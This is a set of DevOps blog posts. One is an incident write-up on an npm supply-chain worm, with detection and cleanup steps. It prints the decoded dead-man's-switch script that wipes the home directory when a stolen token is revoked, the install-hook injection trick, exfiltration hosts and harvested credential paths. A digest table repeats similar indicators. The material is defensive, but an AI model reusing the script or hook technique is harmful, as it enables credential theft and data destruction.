The same shape works as a Gatekeeper constraint if you are on OPA. Both are admission-time defences, so they prevent new bad Applications but do not retroactively fix existing ones. Pair with the jq query above to clean up what is already in the cluster.

The pattern: redaction-by-handler is fragile

CVE-2026-42880 is the second authorization-bypass of this exact shape in Argo CD inside twelve months. The previous one was CVE-2025-55190 on September 4, 2025, CVSS 9.9. That bug lived in server/project/project.go and leaked repository credentials through the GetDetailedProject endpoint. Same default RBAC (any authenticated user with projects, get), same missing redaction call.

Both bugs share a structural property worth flagging. Argo CD's redaction is per-handler, not middleware. Every endpoint that returns an object is responsible for calling hideSecretData() or its equivalent before serialising. Adding a new endpoint without that call ships a CVE. Adding a new field that holds a secret to an existing response ships a CVE.

For operators, the practical lesson is to stop treating role:readonly as if read-only is meaningful in a security sense. It grants get against everything, and "get returns Secret values" turns out to be true twice in a row. The realistic default for shared Argo CD instances is:

policy.default: "" (no implicit role)
Explicit per-team roles with only the verbs and resources the team needs
An explicit admin role for the platform team
Kyverno or Gatekeeper guards on the annotations and ConfigMap fields known to be dangerous

Treat the next "low-severity read-only information disclosure" advisory from the project the same way you would treat a privilege-escalation one, because the read-only/privilege-escalation distinction has so far been a coin flip.

Sources

GHSA: github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3
NVD: nvd.nist.gov/vuln/detail/CVE-2026-42880
Argo CD v3.3.9: github.com/argoproj/argo-cd/releases/tag/v3.3.9
Argo CD v3.2.11: github.com/argoproj/argo-cd/releases/tag/v3.2.11
Diff strategies docs (annotation syntax): argo-cd.readthedocs.io/en/stable/user-guide/diff-strategies
Built-in RBAC policy source: github.com/argoproj/argo-cd/blob/master/assets/builtin-policy.csv
Prior pattern, CVE-2025-55190: github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff

Patch, then audit your RBAC. The annotation is the smoking gun. The RBAC default is the loaded weapon.

TanStack npm Worm: The Supply-Chain Attack With a Dead-Man's Switch

DevOps Daily Team — Tue, 12 May 2026 09:00:00 GMT

Update (May 12, 2026): Socket is now tracking the same worm crossing into PyPI. Newly confirmed compromised: @opensearch-project/opensearch 3.5.3, 3.6.2, 3.7.0, 3.8.0 (1.3M weekly downloads), mistralai 2.4.6, and guardrails-ai 0.10.1. The cross-ecosystem jump is the same harvested credentials being reused on a different registry, not a new worm. If you ran any of the bad npm versions, treat PyPI tokens (~/.pypirc, ~/.config/pip/) as compromised too.

On May 11, 2026, at around 19:20 UTC, two new versions of @tanstack/react-router appeared on npm. They were signed with valid SLSA provenance, published through the project's existing GitHub Actions OIDC trusted-publisher binding, and showed up as latest within minutes. By the end of the day, 14+ official TanStack packages were on the list, the worm had already propagated to 200+ downstream packages, and one detail in the payload was making people delete their npm caches with shaky hands: if you revoke the stolen GitHub token, a background process polling api.github.com sees the 401 and runs rm -rf ~/.

This post walks through what the attack did, why your normal incident-response reflex (revoke the leaked token) is the exact thing it wants you to do, and the commands to run right now to confirm you are not infected.

TL;DR

TanStack's npm publish workflow was compromised. The attacker published valid, SLSA-signed versions of @tanstack/react-router, @tanstack/react-start, @tanstack/router-core, @tanstack/history, and ~10 more official packages.
The packages install fine and behave normally. They smuggle a 2.3 MB obfuscated router_init.js into each tarball and trigger it through a malicious optionalDependencies entry that points at an orphan commit in a forked GitHub repo.
On install, the payload harvests AWS IMDS credentials, GCP metadata, Kubernetes service-account tokens, Vault tokens, GitHub tokens, SSH keys, and ~/.npmrc, then exfiltrates over Session/Oxen (a fully end-to-end encrypted messenger network with no centralized C2 to block).
It also drops a dead-man's switch: a shell script registered as a systemd --user service on Linux or a LaunchAgent on macOS that polls api.github.com/user every 60 seconds with the stolen token. The moment that token starts returning HTTP 40x (because you revoked it), the script runs rm -rf ~/ and exits. There is a 24-hour TTL after which it gives up on its own.
The worm also enumerates other packages each compromised maintainer owns (via registry.npmjs.org/-/v1/search?text=maintainer:) and republishes them with the same injection, which is how 200+ unrelated packages picked up the payload before takedown.
If you ran npm install against affected versions, follow the detection commands below before revoking anything.

Prerequisites

Familiarity with how npm runs lifecycle scripts on install
Basic shell access to whichever machine ran npm install recently
A GitHub Personal Access Token or fine-grained token if you want to assess your token blast radius

What got compromised

Per the GitHub issue thread and the post-mortem at tanstack.com/blog/npm-supply-chain-compromise-postmortem, the confirmed-bad versions are:

Package	First bad version	Second bad version (was `latest`)
`@tanstack/history`	1.161.9	1.161.12
`@tanstack/router-utils`	1.161.11	1.161.14
`@tanstack/router-core`	1.169.5	1.169.8
`@tanstack/router-devtools-core`	1.167.6	1.167.9
`@tanstack/react-router-devtools`	1.166.16	1.166.19
`@tanstack/router-generator`	1.166.45	1.166.48
`@tanstack/virtual-file-routes`	1.161.10	1.161.13
`@tanstack/router-plugin`	1.167.38	1.167.41
`@tanstack/react-router`	1.169.5	1.169.8
`@tanstack/router-devtools`	1.166.16	1.166.19
`@tanstack/react-start`	1.167.68	1.167.71
`@tanstack/router-cli`	1.166.46	1.166.49
`@tanstack/router-vite-plugin`	1.166.53	1.166.56
`@tanstack/solid-router`	1.169.5	1.169.8

Bad versions were live from roughly 19:20 UTC to npm takedown. The worm also republished 200+ packages owned by other maintainers it touched. Socket maintains a running list at socket.dev/supply-chain-attacks/mini-shai-hulud.

@tanstack/query*, @tanstack/table*, @tanstack/form*, @tanstack/virtual*, and @tanstack/store were not affected.

The trick: optionalDependencies pointing at a hidden orphan commit

The packages themselves look normal. The malicious code is loaded by a single line in package.json:

"optionalDependencies": {
  "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}

When you run npm install, npm resolves that git dependency by fetching the tanstack/router repo at commit 79ac49ee. That commit is an orphan pushed to a fork specifically so it does not appear in the default branch history. Because npm treats git dependencies as "build from source," it pulls down the commit's declared dependencies (including bun) and runs the prepare lifecycle script:

"scripts": {
  "prepare": "bun run tanstack_runner.js  && exit 1"
}

The && exit 1 is the clever bit. It makes the optional install fail, so npm silently discards @tanstack/setup from the dependency tree and produces no error in the install output. But bun run tanstack_runner.js already ran. tanstack_runner.js then loads the real payload, router_init.js, a 2.3 MB obfuscated file that the attacker smuggled into the tarball at the package root. The file is not listed in the package's "files" array and nothing else references it, so it would not appear in a casual code review of the package source.

This is what npm pack shows on a confirmed-bad version:

npm pack @tanstack/history@1.161.12   # does NOT run install scripts
tar -xzf *.tgz
cat package/package.json | grep -A3 optionalDependencies
ls -la package/router_init.js

If router_init.js exists and the optionalDependencies entry points at a tanstack/router# git ref, that copy is malicious.

What the payload actually does

On a successful install, router_init.js runs three workloads:

Credential harvest. It walks the standard cloud and developer credential locations: AWS IMDS (169.254.169.254) and Secrets Manager, GCP instance metadata, Kubernetes service-account tokens (/var/run/secrets/kubernetes.io/serviceaccount/token), Vault tokens, ~/.npmrc, GitHub tokens (from ~/.config/gh/hosts.yml and env), and SSH private keys under ~/.ssh.
Exfiltration over Session. The harvested data is uploaded to file endpoints on the Session/Oxen messenger network: filev2.getsession.org, seed{1,2,3}.getsession.org. Session is an end-to-end encrypted dead-drop with no central server the defender can sinkhole, so traditional IOC blocklists do not help here.
Self-propagation. It queries https://registry.npmjs.org/-/v1/search?text=maintainer: to enumerate every package the compromised maintainer owns, then republishes each one with the same optionalDependencies injection and the same router_init.js smuggled into the tarball. This is the worm part: every infected maintainer becomes a new vector. Socket counts 200+ packages this way as of writing.

This is roughly what makes the incident structurally different from event-stream or colors.js. There is no shady contributor to spot in the PR history. There is no missing 2FA. The compromise happened in the publish pipeline itself, the cryptographic provenance proves the tarball came from the project, and the malicious code does not appear in the package's source tree because it is fetched at install time from a fork.

The dead-man's switch

This is the part of the payload most defenders are not used to thinking about. Before exfiltrating credentials, the script installs a watchdog:

On Linux, a systemd --user service under ~/.config/systemd/user/ that runs ~/.local/bin/gh-token-monitor.sh.
On macOS, a LaunchAgent named com.user.gh-token-monitor under ~/Library/LaunchAgents/.

The script polls the GitHub API every 60 seconds. If the response status starts returning 40x, the handler runs and the script exits.

The decoded script (extracted from the obfuscated router_init.js payload, thanks to lmt-swallow on the issue thread):

#!/usr/bin/env bash
set -euo pipefail

CONFIG_DIR="${HOME}/.config/gh-token-monitor"
GITHUB_TOKEN="$(cat "${CONFIG_DIR}/token")"
HANDLER="$(cat "${CONFIG_DIR}/handler")"
STARTED_FILE="${CONFIG_DIR}/started_at"

MAX_TTL=86400        # 24 hours
CHECK_INTERVAL=60    # poll every minute

if [[ ! -f "$STARTED_FILE" ]]; then
  date +%s > "$STARTED_FILE"
fi
START_TIME=$(cat "$STARTED_FILE")

while true; do
  ELAPSED=$(( $(date +%s) - START_TIME ))

  if [[ $ELAPSED -ge $MAX_TTL ]]; then
    # 24h reached, give up cleanly so we are not a long-term footprint
    rm -f "$STARTED_FILE"
    exit 0
  fi

  HTTP_STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer ${GITHUB_TOKEN}" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/user") || true

  if [[ "$HTTP_STATUS" =~ ^40[0-9]$ ]]; then
    # Token was revoked. Trigger the handler (rm -rf ~/) and exit.
    eval "$HANDLER"
    rm -f "$STARTED_FILE"
    exit 0
  fi

  sleep $CHECK_INTERVAL
done

The handler stored in ${CONFIG_DIR}/handler is rm -rf "$HOME" (or equivalent, since implementations vary by victim build of the payload). The 24-hour TTL is interesting: after 24 hours the script exits on its own, which means there is a narrow window for this to fire. If you are reading this more than a day after the May 11 release window, the dead-man's switch on a previously infected machine has likely already disarmed itself, but the credential exfiltration and any other persistence mechanisms are still in place.

The takeaway for the operational response is uncomfortable but real: do not start by revoking the GitHub token. First check whether the machine that ran npm install is infected, then disarm the watchdog (delete the systemd user service, the launch agent, and the script), then revoke. If you revoke first on a machine where the watchdog is still running, the next poll within 60 seconds runs rm -rf $HOME.

How to check your machine

Run these on any developer workstation or CI runner that installed an affected version on or after May 11, 2026, 19:20 UTC:

# Files the payload drops
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs' 2>/dev/null
find ~/.config -name '*gh-token-monitor*' 2>/dev/null
find ~/.local/bin -name 'gh-token-monitor.sh' 2>/dev/null
find /tmp -name 'tmp.ts018051808.lock' 2>/dev/null

# Running processes
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun' | grep -v grep

On Linux, also check the systemd user unit:

systemctl --user list-unit-files | grep -i gh-token
systemctl --user status gh-token-monitor.service 2>/dev/null

On macOS, also check LaunchAgents:

launchctl list | grep -i gh-token-monitor
ls -la ~/Library/LaunchAgents/ | grep -i gh-token-monitor

And look directly at the tarballs in your npm cache for the smuggled router_init.js:

find ~/.npm/_cacache -name 'tanstack-*.tgz' -exec sh -c '
  for f; do
    if tar -tzf "$f" 2>/dev/null | grep -q "package/router_init.js"; then
      echo "INFECTED: $f"
    fi
  done
' _ {} +

If any of the above returns a hit, treat the machine as compromised and follow the response below before touching tokens.

Response, in order

Disarm the watchdog before revoking tokens. Stop the service, delete the script, kill any hanging gh-token-monitor or bun tanstack_runner processes.

Linux:

systemctl --user stop gh-token-monitor.service 2>/dev/null
systemctl --user disable gh-token-monitor.service 2>/dev/null
rm -f ~/.config/systemd/user/gh-token-monitor.service
rm -f ~/.local/bin/gh-token-monitor.sh
rm -rf ~/.config/gh-token-monitor
systemctl --user daemon-reload
pkill -f gh-token-monitor || true
pkill -f tanstack_runner || true

macOS:

launchctl unload ~/Library/LaunchAgents/com.user.gh-token-monitor.plist 2>/dev/null
rm -f ~/Library/LaunchAgents/com.user.gh-token-monitor.plist
rm -f ~/.local/bin/gh-token-monitor.sh
rm -rf ~/.config/gh-token-monitor
pkill -f gh-token-monitor || true
pkill -f tanstack_runner || true

Pin lockfiles back to a known-good version range, delete node_modules and package-lock.json / bun.lock / yarn.lock, reinstall from scratch on a clean machine.
Rotate everything the payload could have touched after you have disarmed the watchdog: GitHub tokens (PATs and OAuth app installs), npm tokens, AWS access keys, GCP service-account keys, Vault tokens, SSH keys, ~/.npmrc auth lines. If a CI runner installed an affected version, rotate that runner's IAM role too because the payload pulls IMDS credentials from inside the runner.
Check your npm publish history. If you maintain other packages on the same machine, the worm may have already republished them. Look at recent publish events on npmjs.com/~ for tarballs you did not push.
Audit GitHub Actions logs for any workflow runs that exported the NODE_AUTH_TOKEN or npm_token environment in the last 24 hours. If your publish workflow runs on pull_request from forks, treat the entire publish pipeline as suspect.

Why SLSA provenance and 2FA did not help

The TanStack team had:

Two-factor authentication on every maintainer account.
npm trusted-publisher binding via GitHub Actions OIDC, so npm tokens never live on a maintainer machine.
SLSA build provenance on every published tarball.

The malicious versions had all three. They were signed by the real publishing workflow, OIDC-bound to the real GitHub repo, and the provenance cryptographically proves they came out of the TanStack CI environment. To npm and to anyone verifying provenance, the bad versions look 100% legitimate, because in a strict sense they are: they came from the project's own pipeline. The compromise was earlier in the chain. A workflow file was modified to publish what the attacker wanted, OIDC then minted the publish token, and the audit trail records a clean release.

SLSA provenance answers "did this artifact come from this build pipeline?" It does not answer "did this build pipeline only run code its maintainers wrote?" That gap is exactly where this attack lives, and the difference between this and prior npm worm incidents is that the payload now includes the destructive watchdog, not just credential theft.

Hardening for next time

        Source                Build                Publish
          │                     │                      │
          ▼                     ▼                      ▼
   ┌────────────┐        ┌────────────┐       ┌─────────────┐
   │  Reviewed  │  ───▶  │   CI in    │  ──▶  │ npm registry│
   │   commits  │        │  sandbox   │       │ (SLSA proof)│
   └────────────┘        └────────────┘       └─────────────┘
        ▲                     ▲                      ▲
        │                     │                      │
    branch              isolated runners        publish workflow
    protection +        + pinned action SHAs    on `release`  
    required reviews    + no `pull_request`     events only,
                        from forks               not on `push`

The two anti-patterns that matter most for maintainers, because they are the actual entry point in this incident and several recent npm compromises:

Do not use pull_request_target for workflows that touch publish secrets. Unlike plain pull_request, pull_request_target runs in the context of the base branch with full secret access, but checks out the attacker-controlled head SHA. An attacker can open a PR that modifies a workflow file or a build script, the workflow runs with secrets, and you have shipped your npm token to them. If you need fork CI, split into two workflows: a no-secret pull_request build for the fork content, and a separate secret-using workflow that only triggers on release or merged commits in the upstream repo.
Do not share caches between PR builds and publish jobs. A poisoned ~/.npm or node_modules cache from a fork PR run will be restored by the next publish run if both jobs use the same actions/cache key (or the default actions/setup-node cache). That is the path from "attacker opens a draft PR" to "attacker's code runs at publish time," and it is exactly what the TanStack post-mortem identified as the entry point. Use different cache keys, or skip the cache on publish workflows entirely.

Other concrete actions:

Pin every third-party GitHub Action to a commit SHA, not a tag. Tag references are mutable. The TanStack post-mortem confirms this was part of the hardening they shipped after the incident.
Use npm ci with --ignore-scripts in CI for anything that does not actually need lifecycle scripts. Library builds usually do not.
Adopt dependency cooldowns. The malicious window was open for hours. Tools like Renovate, Dependabot grouping, or socket.dev's package cooldown rules can hold new versions for 24-72 hours before letting them into your repo, which is enough time for a community-driven detection like this one to land.
Audit optionalDependencies specifically. The clever trick in this attack is that the malicious dependency is technically optional, so its failure does not break installs and does not show up in normal install logs. npm install --dry-run against a confirmed-bad version still shows the tanstack/router# reference, which is the cleanest signal.
Treat your OIDC trust binding as a high-value secret. Rotating npm tokens does nothing if the workflow itself is what republishes packages. The TanStack team's post-mortem explicitly notes this: until the OIDC binding was revoked, the worm could keep publishing.

What we are watching

A few open threads as of May 12 morning:

npm's takedown timing. Carlini's report went in within minutes of the publish. The malicious versions were installable for several hours afterward. Socket's tracker has the cleanest view of the per-package timeline.
Whether the same workflow-injection technique is being reused against other large npm orgs in the next 24 hours. The Nx incident in 2025 saw copy-cat attacks within days.
Long-term persistence. The 24-hour TTL on the dead-man's switch suggests the attacker did not want a long footprint. Other persistence mechanisms reported in the GitHub thread (*/.claude/setup.mjs, */.vscode/setup.mjs) have not been fully analyzed yet at time of writing.

Sources

TanStack GitHub issue with the full technical thread: TanStack/router#7383
TanStack post-mortem: tanstack.com/blog/npm-supply-chain-compromise-postmortem
Nicholas Carlini's initial fingerprint and package list: issue comment
Decoded gh-token-monitor.sh script: issue comment from lmt-swallow
Socket running tracker: socket.dev/supply-chain-attacks/mini-shai-hulud
StepSecurity write-up: stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem
Earlier tweet thread with the dead-man's switch detail: @intcyberdigest on X

Run the detection commands. Disarm before you revoke.

Distributed Tracing with OpenTelemetry: From Instrumentation to Visualization

DevOps Daily Team — Mon, 11 May 2026 09:00:00 GMT

A customer complains the checkout page is slow. You check the frontend logs. Nothing useful. You check the API gateway logs. The request took 4.2 seconds. You check the order service. It says the request took 180 milliseconds. You check the payment service. It says it never received the request. You check the database. Everything looks fine.

Now you have a problem. The 4 seconds happened somewhere between the gateway and the order service, but you have five services, two message queues, and a Redis cache in that path. Logs alone will not save you here.

This is what distributed tracing fixes. Instead of stitching together unrelated log lines, you get one timeline that follows a single request through every service it touches. OpenTelemetry is the vendor-neutral way to produce those traces. This post walks through instrumenting a Python service, running the OpenTelemetry Collector, and getting traces into Jaeger so you can actually see where the time went.

TLDR

Install the OpenTelemetry SDK and auto-instrumentation for your framework.
Set OTEL_EXPORTER_OTLP_ENDPOINT to point at a Collector.
Run the Collector with an OTLP receiver and a Jaeger or Tempo exporter.
Open Jaeger, find the trace, and read the timeline. The fat span is the problem.

Prerequisites

Python 3.10+ or Node.js 18+ (the examples use Python with Flask, the concepts translate)
Docker and Docker Compose
A basic microservice you can poke at, or follow along with the demo below
Port 4317 (OTLP gRPC), 4318 (OTLP HTTP), and 16686 (Jaeger UI) free locally

What a Trace Actually Is

A trace is a tree of spans. A span is one unit of work with a start time, duration, attributes, and a parent. Every span in a trace shares a trace ID. The root span is the first thing that received the request. Every child span sits underneath it.

Trace abc123 (4.2s)
├── gateway: POST /checkout         [4.2s]
│   ├── auth: validate-token        [12ms]
│   └── orders: create-order        [4.1s]   <-- where the time went
│       ├── db: INSERT orders       [8ms]
│       └── payments: charge-card   [4.0s]   <-- and here
│           └── http: stripe API    [3.9s]   <-- the real culprit

That right column is what you need. Logs cannot tell you that 3.9 seconds of a 4.2-second request was waiting on the Stripe API. A trace can.

Step 1: Instrument a Python Service

Start with a Flask service that calls a downstream service. Install the SDK plus the auto-instrumentations:

pip install opentelemetry-distro \
            opentelemetry-exporter-otlp \
            opentelemetry-instrumentation-flask \
            opentelemetry-instrumentation-requests

opentelemetry-bootstrap -a install

The opentelemetry-bootstrap command scans your installed packages and pulls in matching instrumentations. If you have psycopg2 or redis-py installed, it installs those instrumentations too.

Here is the service. It is deliberately small so you can see what is going on:

# app.py
from flask import Flask, jsonify
import requests
from opentelemetry import trace

app = Flask(__name__)
tracer = trace.get_tracer(__name__)

@app.route("/checkout")
def checkout():
    with tracer.start_as_current_span("validate-cart") as span:
        span.set_attribute("cart.items", 3)
        # pretend work
        total = 42.00

    with tracer.start_as_current_span("charge"):
        r = requests.post(
            "http://payments:8000/charge",
            json={"amount": total},
            timeout=5,
        )
        r.raise_for_status()

    return jsonify(status="ok", total=total)

You did not write any tracer setup. Flask and the requests library are auto-instrumented, so the HTTP entry point and the outbound HTTP call already create spans. The two manual spans add business context (validate-cart, charge) so the timeline reads in your language, not the framework's.

Run it with the OpenTelemetry wrapper:

export OTEL_SERVICE_NAME=checkout-service
export OTEL_EXPORTER_OTLP_ENDPOINT=http://localhost:4317
export OTEL_TRACES_EXPORTER=otlp

opentelemetry-instrument flask run --port 8000

OTEL_SERVICE_NAME is the one variable people forget. Without it, every service shows up as unknown_service in Jaeger and your traces look like spaghetti.

Step 2: Run the OpenTelemetry Collector

You could send traces directly from the app to Jaeger. Do not do that in any environment you care about. The Collector sits between your apps and your backend and gives you:

A single place to swap backends without redeploying apps
Batching and retry, so a backend outage does not crash your app
Sampling, so you do not pay to store every trace
Attribute filtering, so PII does not leak into your tracing backend

Here is a Collector config that accepts OTLP and exports to Jaeger:

# otel-collector-config.yaml
receivers:
  otlp:
    protocols:
      grpc:
        endpoint: 0.0.0.0:4317
      http:
        endpoint: 0.0.0.0:4318

processors:
  batch:
    timeout: 1s
    send_batch_size: 1024
  memory_limiter:
    check_interval: 1s
    limit_mib: 512

exporters:
  otlp/jaeger:
    endpoint: jaeger:4317
    tls:
      insecure: true
  debug:
    verbosity: basic

service:
  pipelines:
    traces:
      receivers: [otlp]
      processors: [memory_limiter, batch]
      exporters: [otlp/jaeger, debug]

The memory_limiter processor matters. Without it, a traffic spike on a slow backend will OOM your Collector and you lose every span in flight.

Step 3: A Compose File That Ties It Together

# docker-compose.yml
services:
  jaeger:
    image: jaegertracing/all-in-one:1.62
    ports:
      - "16686:16686"   # UI
      - "4317"          # OTLP gRPC (internal)
    environment:
      - COLLECTOR_OTLP_ENABLED=true

  otel-collector:
    image: otel/opentelemetry-collector-contrib:0.113.0
    command: ["--config=/etc/otel-config.yaml"]
    volumes:
      - ./otel-collector-config.yaml:/etc/otel-config.yaml
    ports:
      - "4317:4317"
      - "4318:4318"
    depends_on:
      - jaeger

  checkout:
    build: ./checkout
    environment:
      - OTEL_SERVICE_NAME=checkout-service
      - OTEL_EXPORTER_OTLP_ENDPOINT=http://otel-collector:4317
    ports:
      - "8000:8000"
    depends_on:
      - otel-collector

  payments:
    build: ./payments
    environment:
      - OTEL_SERVICE_NAME=payments-service
      - OTEL_EXPORTER_OTLP_ENDPOINT=http://otel-collector:4317
    depends_on:
      - otel-collector

Bring it up and hit the endpoint:

docker compose up -d
curl -X POST http://localhost:8000/checkout

In the Collector logs you should see something like:

2026-05-11T09:14:22.117Z  info  TracesExporter  {"kind": "exporter",
  "data_type": "traces", "name": "otlp/jaeger", "resource spans": 1,
  "spans": 4}

Four spans for one request: the Flask entry, the two manual spans (validate-cart, charge), and the outbound requests call. Open http://localhost:16686, pick checkout-service, and the trace is there.

Step 4: Reading the Trace

This is the part nobody teaches and it is the only part that matters. A trace view in Jaeger looks like a waterfall. Each row is a span. The bar's width is duration. The bar's position is when it started.

When you open a slow trace, look for:

The fattest bar that has no children. That is a leaf operation that took real time. Usually a database query, an HTTP call, or a sleep.
Gaps. A 200ms span where nothing visible is happening means you have uninstrumented code. Add a manual span there.
Sequential spans that could be parallel. Three 100ms calls in a row are 300ms. The same three calls in parallel are 100ms.
Spans with a red icon. That is status_code=ERROR. Click and read the exception.message attribute.

If the slow span is an HTTP call, the trace will usually include the downstream service's spans too, because trace context propagates through HTTP headers. If it does not, you have a propagation problem. Check that both services share the same Collector and that the client side library (here, requests) is auto-instrumented.

Sampling: You Cannot Keep Everything

At any non-trivial scale, you cannot store every trace. The default is to sample everything in dev and use tail-based sampling in prod. Tail-based sampling decides whether to keep a trace after it finishes, so you can keep the slow ones and the error ones and drop the boring ones.

The Collector ships a tail sampling processor:

processors:
  tail_sampling:
    decision_wait: 10s
    policies:
      - name: errors
        type: status_code
        status_code:
          status_codes: [ERROR]
      - name: slow-requests
        type: latency
        latency:
          threshold_ms: 1000
      - name: baseline
        type: probabilistic
        probabilistic:
          sampling_percentage: 1

This keeps every error, every request slower than one second, and a 1% sample of the rest. That gives you enough volume to spot patterns without buying a second house for your observability vendor.

Wire it into the pipeline:

service:
  pipelines:
    traces:
      receivers: [otlp]
      processors: [memory_limiter, tail_sampling, batch]
      exporters: [otlp/jaeger]

Things That Will Bite You

A few real-world snags worth knowing before you hit them in production:

Context not propagating across queues. Kafka, RabbitMQ, and SQS need extra work. The instrumentation libraries inject trace context into message headers, but only if both producer and consumer are instrumented and the broker preserves headers. Old SQS clients silently drop them.
Async code in Python. If you use asyncio and your spans look detached from their parent, you are probably starting spans outside the active context. Use tracer.start_as_current_span inside the coroutine, not before awaiting it.
Cardinality on attributes. Do not put a user ID or a full URL with query string as a span attribute. Use the route template (/users/{id}) instead. High-cardinality attributes blow up the backend's index.
Clock skew between hosts. If a child span starts before its parent according to timestamps, that is clock drift, not a bug. Run NTP.

Next Steps

Now that you have one service traced, here is what to do next, in order:

Instrument the next service in the same request path. Tracing is most useful when more than one service emits spans for the same request. Two is better than one. Five is better than two.
Add manual spans for business logic. Auto-instrumentation gives you HTTP and DB spans. Add spans named after what the code actually does (apply-discount, reserve-inventory). Those are the names you will search for at 3 AM.
Set up alerts on trace data. Most backends can alert on p95(duration) > 2s for route=/checkout. That is far more useful than CPU alerts.
Add resource attributes. deployment.environment, service.version, and k8s.pod.name make traces useful for incident response. Set them via OTEL_RESOURCE_ATTRIBUTES.
Pick a long-term backend. Jaeger all-in-one is great for local. For production, look at Tempo, Honeycomb, or a managed Jaeger. The Collector config stays the same. You only swap the exporter.

The moment you have two services in one trace and you can see exactly where the latency lives, the value of distributed tracing clicks. Before that, it feels like a chore. After that, you will not go back.

DevOps Weekly Digest - Week 20, 2026

Mon, 11 May 2026 00:00:00 GMT

📌 Handpicked by DevOps Daily - Your weekly dose of curated DevOps news and updates!

⚓ Kubernetes

📄 How to get engineering time back from Kubernetes upgrades

Kubernetes powers your products, but with that power and flexibility comes organizational challenges around managing complexity and maintenance. It can be tough for an organization to keep up with the

📅 May 11, 2026 • 📰 CNCF Blog

Detail	Info
Name	Dirty Frag
CVEs	CVE-2026-43284 (xfrm-ESP), CVE-2026-43500 (RxRPC)
Class	Page-cache write primitive, local privilege escalation
Severity	Important (Red Hat); root from any local account
Disclosed	May 7, 2026 (embargo broken)
Reporter	Hyunwoo Kim
ESP patch	Merged in upstream `netdev` tree May 7, 2026
RxRPC patch	Pending upstream as of May 8, 2026
Affected	Ubuntu 24.04.4, RHEL 8/9/10, AlmaLinux 8/9/10, CentOS Stream 10, Fedora 44, openSUSE Tumbleweed, OpenShift 4 (and effectively every kernel that built `esp4` / `esp6` / `rxrpc`)
Required access	Any unprivileged local account, often `CAP_NET_ADMIN` via user namespaces
Working PoC	Yes, public on GitHub
What you do	Apply the vendor kernel update once it ships; in the meantime, blocklist `esp4`, `esp6`, `rxrpc` modules and disable unprivileged user namespaces where possible

Detail	Info
Releases	Next.js 16.2.6 and 15.5.18
Advisories	13 (7 High, 4 Moderate, 2 Low)
Worst CVSS	8.6 (WebSocket SSRF)
Upstream React CVE	CVE-2026-23870 (Server Components DoS)
Affected versions	Varies by advisory; many cover 15.x < 15.5.16 and 16.x < 16.2.5, with some also reaching 13.x and 14.x
Patched versions	15.5.18 (cumulative on the 15.x line) and 16.2.6 (cumulative on the 16.x line)
Node engine	15.5.18 needs `^18.18.0 \|\| ^19.8.0 \|\| >=20.0.0`; 16.2.6 needs `>=20.9.0`
Vercel-hosted	Partially mitigated for some advisories
Self-hosted	Fully exposed until upgraded
What you do	`npm install next@latest` on the same major, redeploy, audit middleware-only authorization

Your version	Exposure	Action
15.5.18 or 16.2.6 (or later on the same line)	Patched	None on framework, audit your code
15.5.16, 15.5.17, 16.2.5	Most fixes landed; the cumulative patch is on 15.5.18 / 16.2.6	Bump to the latest patch on your major
15.x below 15.5.16	Multiple advisories apply (exact set varies; ranges in each GHSA)	Upgrade to 15.5.18
16.x below 16.2.5	Multiple advisories apply (exact set varies; ranges in each GHSA)	Upgrade to 16.2.6
13.x or 14.x	Subset of the advisories reach back to 13.x; partial backports unlikely	Plan a major upgrade

#	Repo	Stars	Best for
1	The-DevOps-Daily/devops-daily	1k+	Tutorials, exercises, and quizzes across the stack
2	nilbuild/developer-roadmap	354k	Visual roadmap to plan your learning
3	bregman-arie/devops-exercises	82k	Interview prep and practice questions
4	kelseyhightower/kubernetes-the-hard-way	48k	Building Kubernetes from scratch
5	MichaelCade/90DaysOfDevOps	29k	A structured 90-day plan
6	milanm/DevOps-Roadmap	19k	Roadmap with linked study resources
7	ramitsurana/awesome-kubernetes	16k	Curated Kubernetes deep-dive material
8	dastergon/awesome-sre	13k	SRE-specific reading list
9	stefanprodan/podinfo	6k	A real microservice to deploy with GitOps
10	wmariuss/awesome-devops	4k	Broader DevOps tooling and practices

Detail	Info
Campaign name	Mini Shai-Hulud
Attribution	TeamPCP (financially motivated)
Disclosed	April 30, 2026
Compromised: PyPI	`lightning` 2.6.2, 2.6.3 (safe: 2.6.1)
Compromised: npm	`intercom-client` 7.0.4
Compromised: Packagist	`intercom/intercom-php` 5.0.2
Window malicious versions were live	~42 minutes (PyPI), longer for npm/PHP
Trigger	`import lightning` (PyPI) or `npm install` / `composer install` (npm/PHP)
What it steals	GitHub, npm, AWS, GCP, Azure, SSH keys, kubeconfig, Vault, Docker, all `.env` files
Exfil channel	`zero.masscan[.]cloud:443/v1/telemetry` (primary), public GitHub repo (fallback)
Worm behavior	Republishes infected versions of any npm package the stolen tokens can write to
What you do	Lockfile audit, kill compromised pins, rotate everything in scope, hunt for "A Mini Shai-Hulud has Appeared" repos under your org

Credential	Where the malware looks
GitHub tokens	`GITHUB_TOKEN`, `GH_TOKEN`, `~/.netrc`, `~/.config/gh/hosts.yml`, validated against `api.github.com/user`
npm tokens	`NPM_TOKEN`, `~/.npmrc`
SSH keys	`~/.ssh/id_*`, `~/.ssh/authorized_keys`, `SSH_AUTH_SOCK`
AWS	`~/.aws/credentials`, `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`, `AWS_SESSION_TOKEN`, IMDSv2 fetch on EC2 runners
GCP	`GOOGLE_APPLICATION_CREDENTIALS`, `~/.config/gcloud/`
Azure	`~/.azure/`, az-cli refresh tokens
Kubernetes	`~/.kube/config`, `KUBECONFIG`, in-cluster service account tokens
Vault	`VAULT_TOKEN`, `~/.vault-token`
Docker	`~/.docker/config.json` (registry passwords)
`.env` files	Recursive scan for `/.env`, `/.env.*` from the workspace root
Cloud provider IMDS	`169.254.169.254` if reachable

Detail	Info
CVE	CVE-2026-3854
Class	Remote code execution via header injection
CVSS	8.7
Affected	GitHub.com (already patched), GitHub Enterprise Server <= 3.19.3
Reported	March 4, 2026 by Wiz
Fixed on github.com	March 4, 2026 (within 75 minutes)
